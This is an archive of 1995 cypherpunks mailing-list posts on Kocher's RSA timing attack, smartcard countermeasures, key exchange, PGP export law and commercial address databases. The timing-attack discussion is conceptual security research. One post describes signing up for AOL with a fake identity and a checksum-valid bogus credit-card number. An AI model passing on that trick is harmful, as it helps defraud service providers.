-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 16 Dec 1995 07:42:44 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Attacking Clipper with timing info?
In-Reply-To: <9512140458.AA25132@bilbo.suite.com>
Message-ID: <199512140807.DAA19083@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jim Miller writes:
> That brings up an issue I occasionally think about...At what point does  
> NSA's secrecy become more of a liability than an asset.  Should the NSA  
> reveal flaws in crypto-systems in wide use here in the US to protect US  
> companies and individuals from attack or should they remain quite so they  
> can exploit them in the interests of national security?

As usual, I speak at most for myself. But I think it's pretty safe to say
that most people here believe the privacy interests of individuals (and
companies) outweigh the allegedly conflicting "national security" interests
of the countries in which we reside. A great deal has been written (more
eloquently) on this point. The NSA doubtless believes it has a "national
security" interest in knowing the contents of my communications with my very
good friend in the USAF. I strenuously disagree. This is one of the reasons
I devote so much of my time to, er, cypherpunking :)

(It has also been noted by many before me that preserving the privacy of U.S.
entities is a significant national security interest in and of itself.)

-Futplex <futplex@pseudonym.com>
"The guys in the powdered wigs had it about right in 1792, and there's good
reason why in 200-plus years we have not amended the Bill of Rights, which is
what this legislation would do." -White House Press Secretary Michael D. 
McCurry, commenting on the Administration's position on the proposed flag
desecration amendment to the U.S. Constitution




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 14 Dec 1995 17:06:49 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Elevator Problem
In-Reply-To: <199512121533.JAA21358@cdale1.midwest.net>
Message-ID: <199512140825.DAA19241@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dave writes:
> Disregarding the "quantum properties of light" issue, if Eve can listen
> in on every communication between Alice and Bob about their keys, then
> doesn't she have enough information to reconstruct the key herself?

By "disregarding the quantum properties", I assume you are asking about
deterministic cryptosystems. Eve does not have sufficient information if 
Alice and Bob use, say, Diffie-Hellman key exchange (DH). As I said, that's
why DH is so clever. :)  (cf. any good crypto text)  But that's patented
(for now), and we were asked about a patent-free solution.

-Futplex <futplex@pseudonym.com>
"We live in a time when...individual rights are constantly expanded" -Sen. 
Orrin Hatch (R-UT), speaking in support of an anti-flag-desecration 
Constitutional amendment




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 14 Dec 1995 18:46:29 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Elevator Problem
In-Reply-To: <199512130413.XAA04532@pipe4.nyc.pipeline.com>
Message-ID: <199512140944.EAA18499@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


tallpaul writes:
> Alice says to Bob, in front of all of the other people on the elevator: "I
> have generated a large(ish) amount of large(ish) prime numbers and have
> recorded all of them. I have multipled two of the numbers to get an even
> larger non-prime number. I have done this a large(ish) number of times
> until I have a 'large(ish)/2' set of non-prime numbers. The elements of
> this set are [Alice reads off the set of non-prime numbers and Bob along
> with the other people on the elevator record them.] Bob, go home and pick
> one of the non-prime numbers in the set. Factor it. Use the largest prime
> as a private key in your message to me. Since I know what the numbers all
> are, I'll try all of them to see which one decrypts your message." 
>  
> Bob has to factor one large(ish) prime. 
>  
> Alice has to *try* an average of "large(ish)/2" private keys to decrypt
> Bob's message. 
>  
> The other people on the elevator have to *factor* an average of
> "large(ish)/2/2" number of large(ish) numbers to decrypt the message. 
>  
> The *relative* security then depends on the number of digits in the
> large(ish) primes and the number of products in the set Alice reads to Bob.
>
[...example with a set of 2 * 10^6 primes...elided]

I think there are two main (related) problems with this protocol:

(1) It does not offer great security. The time required for a brute force 
attack is only linear in the time required to execute the protocol. So Alice 
will want to start out with an enormous number of primes (the linear factor). 
Even so, the attacker's job is relatively easy.

(2) It is rather impractical. The time required to execute the protocol is
prohibitive (assuming Alice uses a huge number of primes). 

Consider the numbers in your example. Alice generates N = 2*10^6 large primes 
and transmits the 10^6 pair products -- that's on the order of .1 gigabits, or
about 12 megabytes, to transmit (assuming products around 100 bits long, so
Bob can factor one before the heat death of the universe). Bob factors one of 
the products, which should take a while for all this to be at all worthwhile.
Let's say it takes Bob approximately an hour to factor.

This will take too long to do online. Alice and Bob won't generate new keys 
for each session this way. But to limit the chance that Eve can start to 
decrypt their communications in real time to 10%, if Eve has 100
times the computing power of Bob, they'll need to negotiate a new key every
6 weeks or so. This is not so hot.

Comments ?

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: awestrop@nyx10.cs.du.edu (Alan Westrope)
Date: Thu, 14 Dec 1995 20:59:11 +0800
To: cypherpunks@toad.com
Subject: Denver area meeting, SUNDAY, 12/17, 2 pm
Message-ID: <OKB0wo9g/o8d085yn@nyx10.cs.du.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As usual, we'll begin at the Tivoli, near the downtown Auraria campus
(send email for directions).  Weather permitting, we'll have Yet Another
Demonstration of the Peripatetic Cypherpunks Protocol (patent pending),
visiting Lower Downtown's restaurants, saloons, libraries, the Tattered
Cover Bookstore, whatever...

Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNAUk1RRFMq4NZY5AQEKiAQAjihODhe8tuPqAf47XMX4kKgsSLpaQkAd
922Ve0MkZB3X1nCDu1Yqf7tavfND+3ORhaFUiu3ZV0WqEBFpYazV9DpFccM81d6S
4dKFhi60CkF8pX5snn87MAkn7vKg0wkGFBTprHe1z+z2u61Y5dFutRwXMchgZTK0
4oFnhsXyVcc=
=umSa
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 14 Dec 1995 19:37:32 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: PGP Interoperability?
In-Reply-To: <9512141007.AA00520@commtouch.co.il>
Message-ID: <199512141052.FAA19291@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


You should ask these questions somewhere like alt.security.pgp, if anywhere.
I'll give a two bit answer ;)

Geoff Klein writes:
> Is it legal for a US citizen to encrypt or check signatures with a 2.6ui 
> public key ?

Yes.

> Would sending a public key out of the US be reagarded as export by ITAR?

No (that is, the ITAR place no restrictions on such actions).

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 15 Dec 1995 00:34:28 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: ADDRESS DATABASE?
Message-ID: <Pine.SUN.3.91.951214074025.13177C-100000@crl14.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Something of privacy interest happened to me yesterday.  I phoned
a company to ask for a copy of their catalog.  The phone clerk
asked for my last name and zip code.  After receiving that info,
the clerk asked me, "Is this your full name and address?" and
then gave them both correctly.  I was taken aback.

I have been at my new address for only a couple of months.  Prior
to that, I have been couch surfing for a year and a half.  Though
I called an 800 number, ANI had nothing to do with it since I was
calling from work.  It may have been from a database associated
with a credit reporting agency, a bank or a utility company, but
I am not aware of any of these being available on-line for 
something as mundane as requesting a consumer catalog.  The clerk 
had no idea where the info came from (or so he said).  Does 
anyone know how this trick was done?


 S a n d y

P.S.  If anyone is interested in helping to make an adult
      film, drop me a note.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Connie Sadler <SADLER_C@HOSP.STANFORD.EDU>
Date: Fri, 15 Dec 1995 01:23:58 +0800
To: cypherpunks@toad.com
Subject: Kocher's Paper
Message-ID: <C282ZWBQBTJZ0*/R=REN/R=HOSP/U=SADLER_C/@MHS.STANFORD.EDU>
MIME-Version: 1.0
Content-Type: text/plain


    
    Hi...
    
    Can someone tell me where I can get a copy of Kocher's paper? I haven't 
    read it yet.
    
    Thanks!
    
    Connie
    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Thu, 14 Dec 1995 22:12:19 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Netscape announces position against GAK
Message-ID: <01HYSHEGJFMA94GEQ2@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

TM> I for one am satisfied--and even pleased--with the Netscape
TM> position on GAK.

TM> It remains to be seen how steadfast Netscape, as the major player in
TM> the Web browser business, remains in the face of (likely) pressure
TM> from the government.

i'm not entirely satisfied with netscape's response, but then, i
didn't expect to be. i _expect_ weasling from corporations that have
made the 'big time'. this is the way life is i suppose. what i'd like
to see would be more companies that have an interest in the security
of net-based transations in their best interest, (which would be any
company that intends to do any business on the net) come out
_forcefully_ for strong crypto. the ability of hackers to penetrate
the computers of the net would be greatly curtailed by universal
crypto. is there not a strong national interest in the integrity of
the net in general and financial interactions in particular? looking
forward, which politicians and bureaucrats are loathe to do, commerce
and corporate dealings across the net will only increase. what we
need to do is get large corporations to recognise that privacy is
important to _them_. of course, many already know that privacy is
important to them. why else would we have a body of law concerning
"trade secrets"? i work for a fairly large corporation. this makes
finding who to talk to about this difficult. i'm working on it
though. 

perhaps some of you out there can consider ways to convince those in
positions of authority in your company to realize that crypto
technology works toward their own best interest. they _must_ speak to
this because it is business that runs this world of ours.

TM> It seems to me that we have have been quick to criticize
TM> Netscape--which is good, the quickness part--and thus we should be
TM> equally quick to praise them. To be sure, various of us might've
TM> written the Netscape position statement slightly differently, but
TM> this does not change the basic point:  that Netscape has come out
TM> against the Administration's position on GAK.

TM> For this they deserve our praise.

indeed. netscape deserves praise for including 128-bit encryption in
their products in the first place. while i'd like to see them stand
up and tell big brother to fuck off and die, i am appreciative of
what they've done so far. i'd like to see a representative of
netscape on nightline or the noghtly news hold up a floppy and say
"this floppy contains an encryption program that the u.s. government
will not let us export. it was downloaded from the internet for free
by an executive of a multinational corporation based in germany who
wanted to know why i couldn't sell him a program that was as
cryptologically secure as it is. my answer was that the u.s.
government will not let me."

similar demonstrations of the lunacy of itar are left to your
imagination.

============================
these views are my own. no 
one else in their right mind
would hold them.

amp
<0003701548@mcimail.com> (since 10/31/88)
<alan.pugh@internetmci.com>
Current PGP Key = 57957C9D
December 13, 1995   18:51

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMM9nH4dTfgZXlXydAQGeKgf/XV2sAD7aklD+QfmcSUWReaH5jviADbMV
/wIv6JW4iSOytOa36K5VEXCuep6AUQTIiEflZ4OPU4IXAOKkF3UAxJWoSFY/zT9w
Kgb16I7tjDHohbc3tFikZ3z1Do3vLScxG7ll3CQOfTIr2KIxyN2/XOYkP1fsdvHr
TyBAO4S/ERq1v3BKZJQ1+LskBvPhjtivWs3xU+TBxT9Fc8Op6GmvFyRgjmwMoRfQ
orloUJuLbWWolnFvJMqyAK6pT5+QXZ3eH9ZguGmaLSHS8549Ts+LCirnBxI3HqZ4
sfD9jNRb3HiIG0gowXKU4lWTD4hiV+Se63NKfQYtj+qRfZ1wK+vd5A==
=6FyB
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Fri, 15 Dec 1995 01:32:22 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <9512141637.AA11479@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:42 PM 12/14/95 +0100, Lars Johansson wrote:

>>Does the attack work for existing smartcards?

>At first glance, smart cards would seem to be the most critical target
>to Kocher's timing attack since they usually operate in on-line
>environments.

Not just on-line, they also operate in untrusted (hostile?) 
environments.

>...the terminal could get a (noisy) measure of the time by 
> repeatingly use this command to see when the result is available.

Might a terminal also be able to monitor power consumption or 
electromagnetic emissions to obtain a more precise time estimate?

>Most smart cards does nevertheless require that the user must first
>specify a PIN code before the RSA algorithms are operationable.

If I used my RSA card every day, (at a toll booth, for instance), and 
the "bad guys" pilfered an "exact" timing upon each use, how long before 
they could forge a signature?

>This implies that even if the card gets stolen can't it be attacked
>with Kocher's method.

That is useful, but if I know my card is stolen, I can presumably limit 
my liability by reporting it.  If I still have my card, but my secret 
key is stolen, then damage might be greater.


On another note, timing attacks would not seem to work against 
most DES implementations,  hardware or software.  The time to execute 
each round does not seem to depend on the plaintext or the key.  It could 
be made to, of course, but unless I'm missing something, the "natural" way to 
code it, or to construct hardware for it, is not time dependent.  










Rick F. Hoselton  (who doesn't claim to present opinions for others)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Thu, 14 Dec 1995 18:51:15 +0800
To: trei@process.com
Subject: Re: NT Password Security Update.  Registry values changed!
In-Reply-To: <9512131601.AA04595@toad.com>
Message-ID: <30CFF261.6AE8@nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei wrote:

> Andy, do you have Administrator privs on your NT system? I too seem
> to have full access to all registry entries, including all under Security.

Whoops, it seems that I had auto-refresh switched off in regedt32 so I didn't
see the immediate effect of my changes.  Yes I can see them now, time to
investigate the SAM subkey I think.


Regards,

- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dreschs@austnsc.tandem.com (Sten Drescher)
Date: Fri, 15 Dec 1995 01:35:21 +0800
To: "Jonathan M. Bresler" <jmb@FreeBSD.ORG>
Subject: Re: kocher's timing attack
In-Reply-To: <Pine.BSF.3.91.951213191608.19857D-100000@Aspen.Woc.Atinc.COM>
Message-ID: <55loofy5qn.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


On Firewalls, "Jonathan M. Bresler" <jmb@FreeBSD.ORG> said:

JMB> regarding kocher's timing attack paper:

JMB> RSA attack.  only known ciphertext is needed.  dont know how many
JMB> known ciphertexts are required (related to key size surely).  the
JMB> paper's example is digital signature, rephrase that to Alice signs
JMB> Bob's public key certifying that (you know the story).  After
JMB> several large key signing parties hundreds of known ciphertexts
JMB> could have been generated using Alice's key--each one a public key
JMB> of someone else.  over several years it piles up.  the known
JMB> ciphertexts can be tested/analyzed to yield Alice's secret key.
JMB> ouch.  ;/

	Are you sure about this?  It would seem that the same principle
would then apply to signed messages as well, and I find it a bit hard to
believe that signing messages would make ones key pair vulnerable.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Fri, 15 Dec 1995 00:26:33 +0800
To: cypherpunks@toad.com
Subject: Question about the Timing Attack
Message-ID: <Pine.SUN.3.91.951214104857.4717A-100000@sunflash.eng.usf.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello,
  I have looked over the paper, but I will look more closely this weekend 
(finals going on right now).
  The main question I have, since my programs run over a network with 
dumb terminals is this: If someone can get the timing information why 
would they need it, since they can read the message.  So how can this 
attacker get the timing info without being able to read the message 
(unencrypted)?
  Thanx.

==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black@eng.usf.edu
http://www.eng.usf.edu/~black/index.html
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 15 Dec 1995 04:00:43 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: e-mail forwarding, for-pay remailers
In-Reply-To: <199512140742.XAA06927@ix13.ix.netcom.com>
Message-ID: <Pine.ULT.3.91.951214104824.5962B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Dec 1995, Bill Stewart wrote:

> <andrew_loewenstern@il.us.swissbank.com> wrote:
> 
> >I believe C2.org already offers non-dialup access accounts, paid for  
> >with ECash, that do not require a valid snail-address or phone-number.  
> >I am sure that there will be many more to come.
> 
> I suspect Sameer would be happy to open an account paid in advance in
> small unmarked bills.  AOL probably wouldn't.

AOL will, however, accept a bogus name, address, and credit card number
(as long as the checksum is correct) for the initial ten free hours plus
however long it takes for the first bill to bounce. 

America "On Line" will also accept direct debits from an untraceable bank
account (for this they charge a little extra). 

This is not to say that I have tried any of this (though I have), nor is
it to say that anything on AOL is worth your time anyway. 

> Fortunately, the government
> hasn't really caught on to the importance of email, so they aren't requiring
> that email providers know where you really live.  I predict 1997 for that.

This promises to be an interesting legal fight.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William McVey <wam@fedex.com>
Date: Fri, 15 Dec 1995 02:46:44 +0800
To: cypherpunks@toad.com
Subject: Digital Sigs and the Bar Committee
Message-ID: <199512141730.AA09473@gateway.fedex.com>
MIME-Version: 1.0
Content-Type: text/plain


This was found on Netwatchers (http://www.ionet.net/~mdyer/front.shtml), and 
I figured there would be people on this list willing to comment.

  -- William McVey

BAR COMMITTEE PROPOSES DIGITAL SIGNATURE GUIDELINES

The Information Security Committee of the Science and 
Technology Section of the American Bar Association has 
promulgated proposed Digital Signature Guidelines, and 
is inviting comment through January 15, 1996.  You can 
download the compressed ASCII file at the NetWatchers site, 
subject to the copyright notice below, or you can download 
the text in various formats from the ECL site at
http://www.intermarket.com/ecl/.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 15 Dec 1995 03:35:34 +0800
To: rschlafly@attmail.com (Roger Schlafly)
Subject: Re: Kocher's RSA attack
In-Reply-To: <rschlafly3480927310>
Message-ID: <9512141640.AA22375@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Further to Roger's comments that modular multiplies in software probably do
not allow the timing attacks.

On the internet the randomness introduced by the network probably hides
the timing of the cryptography. I say probably because I am at a conference
and have not got the maths texts to hand. I would guess however that
Shanon's paper on communications bandwidth and some empirical results on
the timing characteristics of the network would allow one to demonstrate that
the attack is infeasible.

On the other hand the attack is quite likely to work against some smart
cards. In particular there are many which do not have specialized modular
multiplication facilities. These use software to implement bignum arithmetic. 
Since smartcards also tend to be slow processors the arithmetic may well have been speeded up with the type of optimisation
been speeded up in an RSAREF type manner.

A conclusion which might be reached is that smartcards should in future contain 
contain a timer which is started at the beginnin of every cryptographic
operation and a delay loop introduced to ensure that the time taken is always
the same. The alternative of attempting to ensure that equal processing is
spent on each cycle threatens an infinite regress into second and third order
effects, eg frequency of page faults. Covert channel analysis is bad enough
as it is.

Perhaps we should concentrate on the question of how the timing attack bight be used
in a workstation environment. Here covert channels are very relevant - with the
proviso that we do not have a process concealment problem but a security 
partitioning problem. Consider the problem of a cryptographic file store where
the users do not have access to a private key used to make files accessible.

I suggest that we attempt to break out these attacks into categories, label 
the categories and produce a companion guide to the attack paper describing its
system level implications. I beleive that such a task is best done in 
a collaborative medium such as this list. We need as many people as possible to
consider the possible attack modes. Nobody is likely to think of them all.

	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: marina kats <marina@commtouch.co.il>
Date: Fri, 15 Dec 1995 02:10:13 +0800
To: cypherpunks@toad.com
Subject: PGP Interoperability?
Message-ID: <9512141007.AA00520@commtouch.co.il>
MIME-Version: 1.0
Content-Type: text/plain



Can anyone out there vouch for the interoperability of PGP 2.6 ui with 
versions of PGP available in USA from MIT & Viacrypt.

What about the legal issue ?
Is it legal for a US citizen to encrypt or check signatures with a 2.6ui 
public key ?
Would sending a public key out of the US be reagarded as export by ITAR?

Thanks
Geoff Klein.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: marina kats <marina@commtouch.co.il>
Date: Thu, 14 Dec 1995 19:24:45 +0800
To: cypherpunks@toad.com
Subject: PGP Interoperability?
Message-ID: <9512141007.AA00523@commtouch.co.il>
MIME-Version: 1.0
Content-Type: text/plain



Can anyone out there vouch for the interoperability of PGP 2.6 ui with 
versions of PGP available in USA from MIT & Viacrypt.

What about the legal issue ?
Is it legal for a US citizen to encrypt or check signatures with a 2.6ui 
public key ?
Would sending a public key out of the US be reagarded as export by ITAR?

Thanks
Geoff Klein.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Fri, 15 Dec 1995 05:35:35 +0800
To: turner@TeleCheck.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512142032.MAA17978@software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:32 PM 12/14/95 -0600, turner@TeleCheck.com wrote:
>

>Just think, with new and improved "interactive TV" you will be able to
>get commercials tailored to your purchasing habits (A doctor would get
>an commercial for an expensive car, while Joe Sixpacks would get the Ford
>Fiestiva).
>
>
I'm doing it now - software.net serves distinct ads to Mac, Windows, Text
and Unix based browsers.  

On the name database side the PO runs somthing called National Change of Address
which tracks who moved where and allows direct marketing companys to clean
their lists.  Almost everybody sells address change data (utilities, the PO,
credit companys) - I'm getting tons of "welcome to the neighbourhood" mail
since I moved.

John Pettitt
jpp@software.net
"why not, and who said so?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Dec 1995 05:56:43 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512142108.NAA03208@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:32 PM 12/14/95 -0600, you wrote:
>sandfort@crl.com said:
>> Something of privacy interest happened to me yesterday.  I phoned a 
>> company to ask for a copy of their catalog.  The phone clerk asked 
>> for my last name and zip code.  After receiving that info, the clerk 
>> asked me, "Is this your full name and address?" and then gave them 
>> both correctly.  I was taken aback.
>
> Taken aback?  Its only going to get worse in the future.  As Telcos, credit
>card companies, etc., start looking for new ways to make money I think 
>selling information about you will increase dramatically.

I'm in the process of moving and getting new phones, and Pac Bell asked me
if it was ok to send my Social Security Number to my long-distance carrier.
I told them "no, but you don't have my SSN anyway" "Oh, you're right, we don't;
can we have it" "No" "OK.  Would you be willing to give us your driver's license
number or another form of ID?  We've just started asking for this recently." 
"Is it required?" "No, it's optional, but I have to ask" "No, thanks"

Sounds like you're right about them getting into the info-selling business.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 15 Dec 1995 03:18:16 +0800
To: hallam@w3.org
Subject: Re: Kocher's RSA attack
In-Reply-To: <9512141640.AA22375@zorch.w3.org>
Message-ID: <199512141815.NAA26051@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Further to Roger's comments that modular multiplies in software probably do
> not allow the timing attacks.

I must disagree, software implementations of RSA can and probably do
allow the timing attacks.  It all depends on the modexp implementation.
Most implementations that I know of, when performing an x^y mod n will
require a squarings and b multiplies, where a is the number of bits in
y and b is the number of 1-bits in y.

You iterate through the bits of y.  For each bit you square x, and if
the bit is 1 you multiply it into an accumulator.  Paul's attack can
determine if this multiply is done or not, given perfect timing
conditions, in 2 ciphertexts per bit.  This CAN happen in software,
and it does in implementations like RSAREF.  In fact, I'm fairly sure
that PGP's MPILib would be subject to this attack if it weren't for
all the other randomness involved in PGP.

The point is that just because an implementation is in software does
not mean you should be sloppy in your protections against this attack.

We should change implementations, both in software and hardware, to
defeat this attack.  Making operations run in constant time seems to
be the best way to defeat this attack.

Yes, we should also look at other possible attacks.  Covert channels
in a workstation environment are important, but they have nothing to
do with Paul's particular attack.  It would be interesting to see how
one could use covert challens to gain the timing information needed to
make this attack, howver.  I have a few ideas.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 15 Dec 1995 03:32:00 +0800
To: stewarts@ix.netcom.com
Subject: Re: e-mail forwarding, for-pay remailers
Message-ID: <01HYSRU3EHHW8Y4ZOH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart" 14-DEC-1995 03:22:12.75

>There are two different sets of relevant rules in the US - Post Office and
state.
The PO's primary interest is making sure you don't mind if they don't
forward your mail once you stop using the Commercial Mail Receiving Agent
(CMRA) and secondarily that you aren't committing fraud by using the mailbox,
sending people change-of-address notices, ripping off your creditors, and
skipping town.  California has a hopelessly dishonest law that just went
into effect in 1995, which pretends to be designed to protect consumers from
fraud by the 7 million small businesses in CA that uses mailboxes,
and actually requires that _anybody_, business or not, who wants to rent
a mailbox must fill out the Post Office form and also appoint the PO or CMRA
as their agent for service of process and give them up-to-date True Addresses.
The PO, meanwhile, "usually wants" a California Driver's License plus another ID
to rent a box from them.  (I didn't have such a thing when I last rented a box,
and the PO hassled my mailbox company into asking for one when the new law
came out.)  After many attempts at calling the PO to get anybody
who knows the _official_ rules for what ID is required, I found a PO lawyer 
who told me the rules are in the "Domestic Mail Manual", which any
Postmaster has, so my next step is to look up one of those before I next get
a mailbox.

So maybe a random photo ID will work, such as your FooBar Consulting
Employee ID, and maybe it won't, depending on what state you live in and how
clueless your local Post Office bureaucrats are.
-----------------
	The more critical question is likely to be what the people at the local
MBE/whatever _think_ the rules are. When I last got a box (under my real name,
in case anyone's wondering), I seem to recall that they'd accept credit cards.
Once one has one box under a given name, this opens up the possibility of
getting a secured credit card to make future access easier. However, I believe
that they do want at least one form of photo ID; I can't remember just off what
their specifications were.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Fri, 15 Dec 1995 04:40:01 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <Pine.SUN.3.91.951214074025.13177C-100000@crl14.crl.com>
Message-ID: <9512141932.AA09881@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain




sandfort@crl.com said:
> C'punks,

> Something of privacy interest happened to me yesterday.  I phoned a 
> company to ask for a copy of their catalog.  The phone clerk asked 
> for my last name and zip code.  After receiving that info, the clerk 
> asked me, "Is this your full name and address?" and then gave them 
> both correctly.  I was taken aback.

 Taken aback?  Its only going to get worse in the future.  As Telcos, credit
card companies, etc., start looking for new ways to make money I think 
selling information about you will increase dramatically.

Just think, with new and improved "interactive TV" you will be able to
get commercials tailored to your purchasing habits (A doctor would get
an commercial for an expensive car, while Joe Sixpacks would get the Ford
Fiestiva).

> I have been at my new address for only a couple of months.  Prior to 
> that, I have been couch surfing for a year and a half.  Though I 
> called an 800 number, ANI had nothing to do with it since I was 
> calling from work.  It may have been from a database associated with 
> a credit reporting agency, a bank or a utility company, but I am not 
> aware of any of these being available on-line for  something as 
> mundane as requesting a consumer catalog.  The clerk  had no idea 
> where the info came from (or so he said).  Does  anyone know how this 
> trick was done?

You might be the victim of the CD-ROM phone-book people, but I doubt it
if you have a new address (the versions lag 6+ months).  Telcos like 
Soutern Bell and South Western Bell are now offering directory lookup 
service to corporate customers on a per-lookup charge.  I think we signed 
on for our collections department to find delinquent individuals.

Perhaps even more frightening is that we now access to account information
from the Star network.  With your I.D., we can do a hit to see if your 
account is still open, closed, overdrawn, or in good standing.  I wonder
how long it will be before it is repackaged giving account balances.

... be afraid...

>  S a n d y

> P.S.  If anyone is interested in helping to make an adult       film, 
> drop me a note.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Fri, 15 Dec 1995 03:21:17 +0800
To: hallam@w3.org
Subject: EMF loopholes and [Re: Kocher's RSA attack]
Message-ID: <v02130507acf621e14fbc@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



>
>A conclusion which might be reached is that smartcards should
>in future contain
>contain a timer which is started at the beginnin of every cryptographic
>operation and a delay loop introduced to ensure that the time taken is always
>the same. The alternative of attempting to ensure that equal processing is
>spent on each cycle threatens an infinite regress into second and third order
>effects, eg frequency of page faults. Covert channel analysis is bad enough
>as it is.
>

I remember the first computer I built had a neat wireless "sound
card" built in. The radio waves generated by the processor could
be modified by choosing the instructions executed. So you could
get sound for your computer games by putting a radion next to
the machine! The delay loops for the games contained multiple
paths for different sounds. It was actually pretty good for the
time.

This leads me to believe that a delay loop might not be good
enough. The leakage from the smart card could be enough to
identify when the card entered the delay loop. The difference
between the signal could be significant.

Just a thought.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 15 Dec 1995 12:35:57 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: ADDRESS DATABASE?
